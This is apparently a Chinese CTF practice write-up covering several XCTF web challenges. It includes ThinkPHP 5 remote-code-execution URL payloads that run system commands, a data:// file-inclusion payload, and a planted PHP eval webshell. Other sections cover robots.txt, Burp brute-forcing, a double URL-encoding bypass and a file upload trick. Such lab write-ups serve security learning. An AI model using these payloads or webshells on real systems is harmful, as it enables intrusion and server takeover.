IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> xctf刷题小记 -> 正文阅读

[PHP知识库]xctf刷题小记

前言

刷题学习知识,这次做做xctf的

php_rce

在这里插入图片描述
进入靶场后只看见了ThinkPHP V5,我们去github上找对应的漏洞
在这里插入图片描述
由于没有说具体版本,因此我们这里随机尝试一个版本的进行注入
在这里插入图片描述
结果如下
在这里插入图片描述
注入成功,因此我们修改函数后面一点即可实现查找,报出flag

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../../

在这里插入图片描述
获取flag

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tac ../../../flag

在这里插入图片描述
得到flagflag{thinkphp5_rce}
漏洞具体成因可以参考这篇文章https://www.cnblogs.com/backlion/p/10106676.html

Web_php_include

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

这种include的,一般可以借用伪协议来getshell,这里过滤了php://,但是还有data://,我们构造payload如下

?page=data://text/plain,<?php system("ls")?>

在这里插入图片描述
没有找到flag,不找了,传木马再进行蚁剑连接

?page=data://text/plain,<?php @eval($_POST[1])?>

用蚁剑来getshell
在这里插入图片描述

在这里插入图片描述

Training-WWW-Robots

进入靶场
在这里插入图片描述
看题猜测是考察robots的,此时我们查看robots.txt
在这里插入图片描述
此时出现一个php文件,长得像flag,查看文件
在这里插入图片描述

有关robots的知识

robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件。
robots.txt文件写法
User-agent: * 这里的代表的所有的搜索引擎种类,是一个通配符
Disallow: /admin/ 这里定义是禁止爬寻admin目录下面的目录
Disallow: /require/ 这里定义是禁止爬寻require目录下面的目录
Disallow: /ABC/ 这里定义是禁止爬寻ABC目录下面的目录
Disallow: /cgi-bin/.htm 禁止访问/cgi-bin/目录下的所有以".htm"为后缀的URL(包含子目录)。
Disallow: /?* 禁止访问网站中所有包含问号 (?) 的网址
Disallow: /.jpg$ 禁止抓取网页所有的.jpg格式的图片
Disallow:/ab/adc.html 禁止爬取ab文件夹下面的adc.html文件。
Allow: /cgi-bin/ 这里定义是允许爬寻cgi-bin目录下面的目录
Allow: /tmp 这里定义是允许爬寻tmp的整个目录
Allow: .htm$ 仅允许访问以".htm"为后缀的URL。
Allow: .gif$ 允许抓取网页和gif格式图片
Sitemap: 网站地图 告诉爬虫这个页面是网站地图

ics-06

在这里插入图片描述

提示说只有一处有痕迹,我们查看源代码发现index.php
在这里插入图片描述

访问
在这里插入图片描述
上面的id是1,那此时就可以考虑一下进行爆破,用bp抓包
在这里插入图片描述
在这里插入图片描述
选择numbers,从1到3000,每一步走的距离为1,也就是说id从1变到3000
在这里插入图片描述
发现flag

PHP2


进入靶场的话只说我们是否能登录界面,没有其他信息,这里拿御剑扫一下(index.phps是自己添加到御剑字典里的)

在这里插入图片描述
访问index.phps后得到源码

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

这里的话我们对admin进行二次url编码即可(服务器解码一次,代码再解码一次)
我们这里用bp来进行二次编码
在这里插入图片描述
得到flag
在这里插入图片描述

upload1

上传个图片,然后抓包修改文件名和文件内容即可
在这里插入图片描述
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-04-28 11:37:02  更:2022-04-28 11:37:16 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 20:27:40-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码